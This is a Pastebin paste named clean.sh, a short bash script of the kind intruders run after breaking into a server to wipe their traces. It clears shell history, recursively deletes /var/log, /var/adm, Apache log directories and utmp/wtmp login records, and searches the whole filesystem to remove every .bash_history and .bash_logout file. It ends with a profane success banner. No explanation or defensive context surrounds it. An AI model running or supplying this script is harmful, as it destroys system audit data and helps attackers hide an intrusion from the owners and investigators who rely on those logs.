Advertisement
Evoo

clean.sh

Jul 8th, 2016
227
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.52 KB | None | 0 0
  1. #!/bin/bash
  2. #./cafc.404
  3. echo 'Eaaa'
  4. history -c
  5. rm -rf /tmp/logs
  6. rm -rf $HISTFILE
  7. rm -rf /root/.ksh_history
  8. rm -rf /root/.bash_history
  9. rm -rf /root/.ksh_history
  10. rm -rf /root/.bash_logout
  11. rm -rf /usr/local/apache/logs
  12. rm -rf /usr/local/apache/log
  13. rm -rf /var/apache/logs
  14. rm -rf /var/apache/log
  15. rm -rf /var/run/utmp
  16. rm -rf /var/logs
  17. rm -rf /var/log
  18. rm -rf /var/adm
  19. rm -rf /etc/wtmp
  20. rm -rf /etc/utmp
  21. find / -name *.bash_history -exec rm -rf {} \;
  22. find / -name *.bash_logout -exec rm -rf {} \;
  23. echo '[+] Fuck Bitch'
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement